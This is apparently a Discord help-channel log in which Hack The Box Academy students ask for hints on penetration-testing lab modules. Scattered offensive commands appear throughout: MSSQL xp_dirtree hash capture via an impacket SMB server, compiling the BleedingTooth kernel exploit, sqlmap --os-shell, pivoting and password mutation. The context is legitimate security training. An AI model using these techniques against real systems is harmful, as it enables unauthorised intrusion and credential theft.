why i cannot install impacket

'sudo apt install python3-impacket'? It's installed on parrot by default I thought.

i cannot use it with python2

someone know any way to exploit eternal blue manually with python3?

I think impacket is python3, so no you couldn't use it with python2.

Any gdb people around that I can ask a question to about the module Attacking Applications Connecting to Services I am getting an error that says:

Cannot access memory at address 0xXXXX```
With the memory address of the call to `SQLDriverConnect@plt`

I figured it out.

Hi, I'm having trouble unlocking my first module, could someone help?

do you have enough cubes to unlock the module? what error are you receiving?

Yes I have 40 and it costs 10, I don't receive an error, I just press unlock and nothing happens.

try refreshing the page and see if it’s unlocked. you can also try logging out and back in as well as clearing browser cache to see if that helps

if that doesn’t work, I’ve never experienced this so you may want to contact support🤷🏼‍♂️

Adblock?

Disabled

Here is what happens

maybe brave's shield or whatever it is called is blocking something

You are right, disabled it and it got solved!

I previously saw somebody having the same issue as me here (responding to that message) but I cannot find their comment anymore. The issue was with nibbles.

If anybody experiences this described above feel free to reach out to me - I'll help you figure out where the mistake comes from.

Anyone here did that did the Footprinting module (SMB in particular) and could help me with my question in #cpts ?

thanks 🙂

I am trying to drag and drop pictures in the chat. It is not working in this channel. Is it blocked? Is there a command or something I am not aware of to do it?

you need to verify your account first, #welcome

ok thx 😉

someone could help me please

#!/bin/bash

Count number of characters in a variable:

echo $variable | wc -c

Variable to encode

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
var=$(echo $var | base64)
done

i need to add an if-else in the for condition that count the characters of the 35th generated value

Can somebody tell me what I am doing wrong here?

well... still have trouble to link the pic 🙂

nvm will try again

Guys, struggling with this.
Linux fundamentals.

What is the type of the service of the "syslog.service"?

systemctl show syslog?

search the man pages of systemctl. there is a specific parameter you can add to get the type of service

That did it, thank you!

in the future please don't spoil questions. give hints and nudges instead of the answer.

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer. How can i find answer for this question ? i've tried all what i learned in "ACTIVE SUBDOMAIN ENUMERATION" but nothing worked, I gave been stucked since yesterday. Would someone help, please ?

Make sure there are no trailing characters

Hey, I'm talking about the commands (nslookup, whatweb, etc...)

Hi everyone. When I tried to open the cheatsheet from the "Shells and Payloads" module received a message from vs code saying there was a virus on that file. It never happended before with other cheatsheets, and I'm pretty sure it's because of the commands in it, but has anyone had the same issue?

Yes it gives an answer such as a.inlanefreight.htb.

It's because of the commands, since they are reverse shells... You can add exclusions to windows defender idk about vs code specifically

ok, thank you

Attacking Common Services - Hard
Can someone give me a hint how i can get access to the msSQL Server
I have access to rdp with the user fiona

You can access mssql with cmd

I want to grab the hashed but when i do it with
EXEC master..xp_dirtree '\10.10.15.234\share'
and listen to with
sudo impacket-smbserver share ./ -smb2support

Then thats the output:
User WIN-HARD\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa

You said you were able to rdp... you're on the right track. Now try accessing the mssql server

I have access to the MSSQL Server

I would delete that command as its spoilers

But you're doing good, keep exploring it

If you get really stuck, dm me

But i need to get the hash or not?

no

but i dont have permission for xp_cmdshell

And also no permission for EXECUTE sp_configure 'show advanced options', 1

||Explore what you can do with the user you were able to impersonate||

ok ill try that thanks

Anyone able to give some guidance on Attacking Common Applicationes - Attacking Thick Clients? I've got the banner up, but I can't seem to see any extra code

Footprinting Lab - Medium
I found credentials for two users ||alex and sa|| but cannot access the MSSQL Server. I tried each user's credentials with the Administrator account and still cannot RDP into the system. Any tips on how to move forward.

once you get the ascii banner to appear, all you need to do is look at the memory map, dump the correct address! look back at the pictures for help 🙂

||restart the lab and try again with RDP against the administrator account||

Yeah I used Ctrl+F9 to Execute until Return until the Banner appears, but there doesn't appear to be anything like the screenshot in the memory map

don’t execute the program or hit F9. you need to step through the program with step into/step over (step over being preferred), which I believe are F7 and F8. click those until the ascii art is printed and then look at the memory map

if you need help understanding the difference between step into and step over, check this out #modules message

Still won't work with either cred

dm me

currently doing the oracle tns section in footprinting and odat.py was running increadibly slow so i tried it in the pwnbox and it ran significantly faster than on my kali vm, i remember this happening with another tool in the past, anyone else experienced this or knows why its happening?

Because the pwnbox is basically a dedicated system, connected basically directly to the tun0 network so less latency

in pivoting module, in chisel section, the pivot box does not contain glibc versions and unable to run chisel binary

perhaps, im talking an hour vs about 5minutes difference

Need a nudge for Attack Common Applications - Web Mass Assignment Vulnerabilities. idk if i'm being blind but I dont see any different parameter? I tried all parameters and it doesn't seem to like any of my answers. Wonder if it is a format issue

nvm got it

Try changing VPN server region And redownloading the file

Hey

hi

this channel is about the modules related to https://academy.hackthebox.com; if you wish to talk in a #general chat -- please do ++verify in #bot-commands and read #welcome and #rules

for ptunnel also, its saying library is missing

Ptunnel is weird in its own right

chisel also not working on pivot box, i transferred entire folder

any help pls

@gentle herald download another version

ok will try

#Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
#Section:Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
#Question: Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
#Description: I have username and password, i need some hint to get the flag

hello team I am doing the module DNS enumeration using python, but when I am trying to enumerate with nslookup or dig the servers does not response

query: nslookup -type=NS inlanefreight.htb 10.129.194.236

response: ** server can't find inlanefreight.htb: REFUSED

with nmap both 53tcp and udp are open

Hello I am doing fundamentals of Linux, i was hoping to get some help answering a question. I am asked to list total packages installed on target Sys. I have used: "apt list -- installed | wc -l" and also checked for dpkg but still cannot obtain the correct answer. Any guidance would be very helpful my internet searches have not helped so I thought to try here.

make sure you are connected the target that you have spawned

I am connected to the target.

Also, have tried to do a unsuccessful update on it. But realized it is probably a closed honey pot type environment.

oof found help on a forum . I was missing a grep for the results. Thanks for the reply!

Firewall and IDS/IPS Evasion - Hard Lab I need a hint please I have no idea what to do been trying everything the past 3 days

@rustic sage

i am here

sorry for pinging

What help do you need

but I need urgent help

i can't understand what commands to give

Wym you can't understand

the last question says: List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

https://linuxtect.com/linux-smbclient-command-tutorial/

Yeah the usage can be very difficult to understand for a beginner

thank you so much dude

But this tutorial should help

Follow instructions in the ids/ips evasion section

hey

@rustic sage

https://ippsec.rocks -> SMBClient

Is your about me corrct?

Dude stop pinging him lol

lol

his about me is sus

maybe just an april fool

The module should have given you the info needed to be able to answer this, what module is it

getting started

That about me has been there since the beginning of this year

Those who know, know

o_o

O_O

The getting started module walks you through a bit

yeah

but

some things go bouncer

happens

What do you mean? What is the command you are using? What do you mean bouncer?

-_-

It went bouncer when he used smbclient for the first time

actually

btw

how do i get advanced roles

like

i am noob rn

you're script kiddie

start by writing your sentences on one line

^

but

Second your role is tied to something completely different. Stay focused on one thing kid

i yet don't understand how to access the file

k

Because you jumped right onto HTB without learning basic system administration or programming

umm....

Your learning curve is bound to be sharper

idk

what is basic

Let me ask you something

Have you installed a Linux distro on a partition before?

umm...

nope

Do you know what package managers are?

nope

Can you troubleshoot any network problems, make it work if it went down for mysterious reasons?

nope

https://linuxjourney.com/
Then start here

This is your real starting point

oh

is it free

i can't afford even 1$

https://tenor.com/view/try-it-and-see-give-it-a-try-try-try-and-see-try-it-yourself-gif-24095805

At least click on the link

@supple vessel - read the part of the page that starts at "Shares" carefully, and go down the line from there

if you're actually taking good notes it shows you what to do EXACTLY how to do it

Also, if anyone recommends you to jump straight to platforms like HTB to learn penetration testing, they're probably themselves very bad at it.

sure

you may need to substitute one or two things in

how much would i take atleast to complete my real starting point?

Don't count the days, make the days count

^

Just go and learn

you're trying to rush it (and it's obvious) because I looked at the page regarding that question; and saw right there they give you the password for Bob

It's better to spend a year on sharpening your blade than go empty handed in a fight.

and how to access the smbshare

as this module isn't meant to be an in-depth exploitation of SMB it's not going to go over a whole bunch aside from "hey connect to this and do this"

ok guys

thank you so much

bye

Has anyone had any problems with x64dbg task in Attacking Common Applications - Attacking Thick Clients just stopping while trying to step through the program?

so im doing the attacking common services module, the task i am now is attacking ftp. I started the machine and it didnt had any ftp server. So i attacked the SMB and got all flags for the smb task. Is this a bug or do i need to reset the machine??

nvm

had to reset the machine 5x times

@rustic sagecan I dm you? because I've run through the program with individual stepping, and I'm still not getting anything in the memory map.

Hi all, I have a question about SQLMAP ESSENTIALS module > Attack Tuning > second task (hope this is the right place to ask such question). in this task i should use custom prefix value. but i was not able to identify it without hint. Is there any way to do it ? Thank you in advance

Can anyone help me understand what this sentence is saying?

the pivoting module requires a constant port forward setup between windows victim for the ongoing modules? eg (if we stop we need to reset it all up again?)

In the "Attacking Enterprise Networks", section "Web Enumeration & Exploitation", the LFI Vulnerability gets listed and forgotten, but together with https://github.com/synacktiv/php_filter_chain_generator RCE can be easily achieved. Also, it is not really tested whether it is LFI or local file read (module just says its LFI). Maybe those could be 2 good improvements?

Hi there, wondering if someone could DM me with a hint for flag5.txt in the Linux Privilege Escalation - Skills Assessment? I have a reverse shell, stabilized but the priv esc won't work. Thanks in advance.

anyone who can help me with priv access in AD enum and ATTACK?
I stuck on the first question

PowerShell version of Inveigh works, but is no longer supported.
There is a C# version of the same tool (that you must compile yourself), but is still supported (receives updates).

could you remove the last part of the sentence? you're somewhat spoiling the priv esc technique used. ||Are you sure you have a stable shell? If you used Metasploit it won't work||

what section?

the only way would be manual enumeration or if you found a way to leak the SQL statement/code being used in that specific question.

got you, thanks !

Active Directory Enumeration & Attacks

that's the module, not the section

privileged access, even though I wrote it u did not manage to notice it

Into to Assembly Language; skills assessment task 1: I don’t understand how I’m supposed to get the answer from the xor decode. Can someone help me?

what's the problem..? look through your Bloodhound results or execute the command taught in the section to identity the other user

It does in return nothing in return

It does not show nothing in return*

are you using powershell or bloodhound?

bloodhound

MATCH ...

maybe I have to choose right node? but looks like I have not found it, since I got nothing

Removed. Thanks

the person who created the original tool that was a powershell only module has now made a C# tool which combines the original PoC (proof of concept) and a port (meaning translating what can only be interpreted by powershell) of most of the code FROM the powershell version.
TL;DR > Powershell version is outdated, but the creator still maintains a different version

thanks guys

Module: Into to Assembly Language
Section: Skills Assessment
I need on the first task, I’ve edited the assembly code and xor d with rbx but not sure if it’s correct and how to use that to get the answer. Can someone help me please?

Hi all, did someone managed with it? https://academy.hackthebox.com/module/113/section/2139 Still couldnt find the anwer :S

@limber cobalt what module

Attacking Common Applications , section Attacking Thick Client Applications

@limber cobalt I haven't done that section

sorry what part of that section

the question

anyone know why i cant execute this

$ gcc -o exploit exploit.c -lbluetooth

trying to use the bleedingtooth exploit

there is only one question and there is many steps to get the answer😅 you're going to have to be more specific where you're stuck

I know where you are, and without additional info (error messages) I can't help. also I don't fully remember, but I don't believe that exploit worked when I tried it.

frustrating :S haha

its definately the kernel exploit for this challenge

# isn't a valid comment in C. you need to remove those lines from the top.

basically what it's telling you is there is no instruction/key word exploit, date, tested, cve

ahhh

right so you'll need to also download that bluetooth.h file whether it's on the Github repo or you find it somewhere else. the file doesn't exist and therefore can't be loaded.

has this library changed?

right

so im missing it

this is why I chose a different exploit, but I forgot which lol

haha

yes you're missing it

good learning i guess :S

where do i save it

https://github.com/torvalds/linux/blob/master/include/net/bluetooth/bluetooth.h

i have the raw code

in the same directory as the c program

actually might have to be in a directory called bluetooth within the same directory as the c program, with all those files being in the bluetooth directory. I haven't done C in years... I have to get back into it

maybe wget https://github.com/torvalds/linux/tree/master/include/net/bluetooth?

or gitclone

/usr/local/include ?

got the library

sudo apt-get install libbluetooth-dev

it compiled

lets see if the exploit will work

hmmm

@rustic sage look familiar?

dosnt appear to work

i suspect something with the mac setup

I used a different exploit🤷‍♂️

roger ill keep looking, bleedingtooth dosnt appear to be very popular anyway

very minimal info on it

For user account control in Windows Privilege Escalation how did the author know to pick "technique number 54"...? When I visit the UACME Github Repo it looks like I have to compile the program myself and then use "akagi32 [Key] [Param]", where I'm assuming [Key] is the technique used... Is there a list of these techniques somewhere and what versions of windows they work for so then I could execute something like "akagi32 54" to get the TTP?

┌─[root@parrot]─[/home/mithu]
└──╼ #hashcat --force password.list -r custom.rule --stdout | sort -u > m_password.list
┌─[root@parrot]─[/home/mithu]
└──╼ #cat m_password.list
┌─[root@parrot]─[/home/mithu]
└──╼ #

Reasons for passwords not being listed with hashcat. Please help

before redirecting output to a file, check if the command is actually outputting anything

Anyone can help for Advanced SQL Injection?

@rustic sage i am beginner. How do I check it?

for module 2 footprinting, I was looking for the x.x.x.203 question. What I am doing wrong with the following command:

The target was live and just spawned. It answered to ping.

hashcat --force password.list -r custom.rule --stdout | sort -u just don't redirect the output > m_password.list.

from a quick look this look right.. try restarting the box. also please remove everything within the spoiler 🙂 you're giving away the answer

hey guys
in Skills Assessment for sqlmap module
i trying to get the flag but i can't
but i cant solve it
any body can help me? 😔

please remove that 4th line you're spoiling the lab.. you can dm me for further help

i remove it

Hi

In Password Attacks Module on the "Password Mutations" section, I have created my mutated password list, but when I go do to crackmapexec or hydra to brute force it, it takes FOREVER. It's brute forcing 1 every 3 seconds. Hydra says its gonna take 1562 hours to go through the whole list. Am I doing something wrong or how am I suppose to find the SSH pass for Sam?

I need help, session security skill assessment ,

Anybody solved this module? Pm me

ok so i finally saw and did the new section in footprinting. I feel like they should really go over that tool a little better

both tools in fact

Anyone mind having a chat regarding Attacking Common Applications - Attacking Thick Clients? I've stepped through the program using nearly every method I can see, and when the banner comes up, there's literally no change to the memory map that I can see. That or the program either crashes. 😦

Im with the same problem 😦 I'm trying to run on another service

If you're having an issue with one service, definitely try another one.

I'm running into an issue with getting the proper syntax for the reverse shell needed in the Attacking Common Services easy lab. Does anyone have any hints they can provide for this lab?

"Attacking Common Services - Easy" whew.... if that was the "easy" lab then... wow, that was rough, then the flag rubs it in your face lol.

Yeah, definitely not very easy. Can you give me a hint for it?

any, mind if I dm you so I don't spoil it too bad for anyone?

Yeah, absolutely!

I have resolved this. The path and stabilizing the shell didn't work, but using enumeration techniques I found an exploit on the machine that allowed me to gain root privileges and get the remaining flag. This was harder than expected, but worth it in the end.

You ever figure this out? not sure where to go.

Delete the first 17000 from your mutated password list.

Anyone? Screenshot from when the banner appears, showing no changes to Memory Map 😦

I really don't understand what I'm supposed to do for "Attacking Common Applications - Attacking Thick Client Applications" I feel like it's such a wild jump from the rest of the content.

It is definitely a jump in terms of material, but I just can't replicate the results from the screenshot, which is why I'm frustrated with it. I can't see what I'm doing wrong.

It sucks too cause I was 100% done with the path and was gonna take the exam for easter

I was 100% done as well. I was going to start work on the tier 3 content.

I was doing the "using web proxies" module, if anyone has doubts in the last test I can help

AD Enumeration & Attacks - Skills Assessment Part II
i’m on the 10th question, having problems in getting the GenericAll rights User password

I can’t help with memory maps as I still don’t fully understand myself. your memory map is fine look at the screenshots from the section and reread and you should be able to tell what memory address is being dumped.

they’re working on a fix for this section with better a explanation. so you either have to wait or if you do solve it definitely go back and check out the updated explanation

it just requires some outside research.. it not copy paste which I actually appreciate. it’s actually challenging people so you learn what’s going on

Module: Into to Assembly Language
Section: Skills Assessment
I need on the first task, I’ve edited the assembly code and xor d with rbx but not sure if it’s correct and how to use that to get the answer. Can someone help me please?

its still going so slow

Yeah, no. While there is an element of outside research none of the other modules requires completely not being able to follow along with the exercise. If there's other outside knowledge, they either explicitly reference it, or point you at the other modules (i.e. web services and attacks points you at SQLi Fundamentals, which you should have already completed on the Bug Bounty path . Chapter definitely needs a few extra screenshots because the Intro to Binary Assembly module is a higher tier module.

Wolfie did you do the mutated wordlist?

I am stuck it wont brute force quickly

I finished it months ago. Delete the first 17,000 entries from list

It will go slowly, thats just how Hydra works with that protocol

You might be able to try with SMB instead

I don't recall

@pine dagger I was using crackmapexec should i be using hydra?

omfg i finally got the credentials

tysm

which question was it?

Ah

there you go

it finally found it

after deleting entries

tyty

Yeah, you would get it long term, but you'd have to do over multiple sessions, and peel out the sessions as you went

I'm stuck in the pivot skill assessement. Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer. I found credentials for mlefay but i'm not able to login anywhere. I also tried to ping sweep on the webshell via for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done but i keep getting ping: 172.16.5.{1..254}: Name or service not known. Could use some help.

AD Enumeration & Attacks - Skills Assessment Part II

I'm stuck on the last two questions… can’t login to DC01 with the creds i got
i need some help

@sage jackal you can pm me with details

Module: Password Attacks, Section: Credential Hunting in Linux. I'm having trouble using Kira and a mutated password version noted in the hint. Am I going into a rabbit hole?

like I said, I’ve heard from other people who’ve reached out to support that the section is being updated to provide a better explanation.

just because the section does not have a good explanation doesn’t mean you give up… and just because other modules have better explanations and references doesn’t mean all modules need to. the module isn’t impossible, it requires some outside research on memory maps🤷🏼‍♂️ you’re not going to always be “spoon feed” the answer or explanation.

I’m not going to argue with you that there should’ve better a better explanation, I agree with you. however, I still learned a ton from that section and if anything I probably learned more from there being little to no explanation because I went out on my own to learn what’s actually happening

have you tried with crackmapexec?

Thanks, i've just completed the module

lowercase name

Escalate to a better shell

Thanks MarcieLee! I was able to figure it out with the help of @wide river

Hey all, im going through the AD LDAP module and am confused on something. I am getting that the functional level of a domain is 7, but its an invalid answer. I know what the answer is supposed to be windows server 2016 but im not sure how to convert the 7 I got to windows server 2016. Like I can't find charts, or any information on what this 7 is referring to

windapsearch -dc x.x.x.x -u "" -m metadata

This is what I am running.
This is my output:

domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7

Question 1 on LDAP Anonymous Bind

Hellooo

hi

Running into an issue with the medium lab for Attacking Common Services. The port shows that it allows anonymous login and I was able to use Curl to get the file name. However, everything I've tried to access the service using anonymous login doesn't work. I either get an error saying can't connect to and the ip address or it just kicks me back to the prompt. Any ideas or could this instance just be broken? This really should be pretty easy since the service is supposed to allow anonymous login.

Hi, I have a question about SQLMAP.
I use SQLMAP with --os-shell but got the error message " HTTP error codes detected during run: 404 (Not Found) - 2 times"
I'm sure I have DBA permissions.
Does the error means SQLMAP couldn't find the web path to upload shell?

Looking for a review here if possible. I am considering doing either (Active Directory PowerView + Active Directory BloodHound + Active Directory Enum & Attacks) or just Active Directory Enum & Attacks). Anyone got experience with these and can chime in whether its worth to do all 3 or just the one?

gm

gm

omg. thanks so much!

Gm

feel free to dm me if you're still struggling

I'm currently on AD Enum & Attacks. it's definitely a good choice. As far as I've seen so far (I'm 2/3 through) it does cover PowerView and BloodHound, though not in great depth. I'd suggest you do AD Enum & Attacks and after that you can decide if you wanna learn more about these two tools

your IP seems weird. you want to run the exploit against the DC

mb, first need connect to linux 172.16.5.225 through ssh from windows machine

yep

hey everyone i wanted to ask a question to all (i am on footprinting section)
do you guys remember all the commands and syntax or refer to the notes (not talking about common tools like nmap)

both

I try to remember as many as possible but you'll always forget some. that's what notes are for

Hi guys, can anybody help me, I'm stuck on Exploiting Web Vulnerabilities in Thick-Client Applications. I can't compile user.java.

Im on Internal Password Spraying - from Windows. When I follow the commands shown in the module it just hangs and doesnt run, anyone able to advise?

it could be due to evil-winrm, have you tried using an rdp session?

Rdp keeps throwing an error

Tried reseting vm,vpn,using the htb vm

All gives the same error

@heady tusk I was able to get some help. Thank you!

well what error then?

same error comes up when using the htb vm

hmm I can't really spot any mistakes. LOGON_FAILURE would indicate something being wrong with the credentials but I don't see any typos

module:AD enum&attack
anyone who got damundsen password left? I cannot find it

Hi, I am attempting the SMTP user enum, I used the resource provided but no results found, I also used another first name word list but no results. Am I missing something? I find users but not any that are correct answer for module. Thank you!

remove the password, or use single quotes

Please am new here how do I get to make money from discord

disregard my comment, I found resolution, Thank you!

What is this question ?

Am new here please

Dynamic Port Forwarding with SSH and SOCKS Tunneling
I enable dynamic port forwarding with SSH with ssh -D 9050 ubuntu@10.129.202.64
And then try to ping 172.16.5.19 with proxychains ping 172.16.5.19
I cant seem to figure out why it doesnt work
tail -4 /etc/proxychains.conf
socks 127.0.0.1 9050

Can someone help me?

I have no idea where im wrong?

now it just shows a black screen

enter/escape/space

wow thanks

works now

any help with Shells & Payloads live engagement Q3 " What distribution of Linux is running on Host-2?" I've already got the flag but am being stupid with this question

you want to make money from discord or from the skills you'd be learning in HTB?

try working for discord

feel free to DM me with some more details on your problem

I don't quite remember how I got it, but usually either Nmap can tell you or if you have a shell there are commands that will tell you

ive tried uname -r, hostnamectl, nmap os detection etc but none of those results work?

dm me then what you tried so far

dunno if that solves it, but you didn't specify a SOCKS version in your config

I just copyied the wrong one

On my own virtualbox it works

on pwnbox it didnt dont know why

I believe pwnbox has two versions of proxychains installed. it might be that something got mixed up there

Hi,
Anyone have a hint for me please at flag 4 on Linux Local Privilege Escalation - Skills Assessment ?
I have found the service, i tried many solution but i can't find the good access to get the flag.

you can dm me

that was a fierce hint

ty

need help. i am doing the EScape lab. I am about to complete the admin privilege escalation. I am stuck on certipy auth ''''''''''''Administrator..I keep getting the error message " Got error: Invalid password or PKCS12 data"

my DM is open

qq on Attacking Common Applications - Exploiting Web Vulnerabilities in Thick-Client Applications. Updating the \hosts file they provide a command echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts is the provided ip our target ip or do we just use the 10.10.10.174? Pinging server.fatty.htb I get a different ip address which I saw was already in the \hosts file

follow the steps in the lab.

1) Open the application & Wireshark
2) Look at Wireshark, what IP is the applications reaching out to?
3) Add that IP address to the hosts file

Here you go! :WIZARD6:

Here you go! :WIZARD6:

@rustic sage did you have trouble when logged into the fatty-client.jar file when looking at specific files? For example, the security.txt or the dave.txt? Sometimes I get Error: Your action caused an error on the application server. And sometimes it doesn't even open the correct file. Or doesn't let you choose... think I am going to wait until this section gets updated.

umm not that I remember. I do remember it took me a minute to learn how to actually open the file because double clicking wasn't working 🫠 didn't see the input field at the bottom... you could try restarting the lab. alternatively, if you've gotten to the step where you're compiling and recompiling make sure you only make the edits where the instructions say to do so. anything else and you could break it

...didn't...see...the...input...field...until...you...said...so...now

wow

this section mannnn

now it's working

had to hit clear about 100 times though

(may have asked in wrong place)

][T]/: Hi! Looking for assistance on File Upload Skills assessment if anyone is around. Getting 404 when looking for uploaded shell. I think naming convention and directory are right but clearly not hitting the nail on the head here.

Thanks! ❤️

you can dm me with what you're trying / doing

Sureeeee can

Reached out 🙂

I am not able to solve the code deobfuction module...in that skill assessment

Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?

This part

Excellent help, appreciated!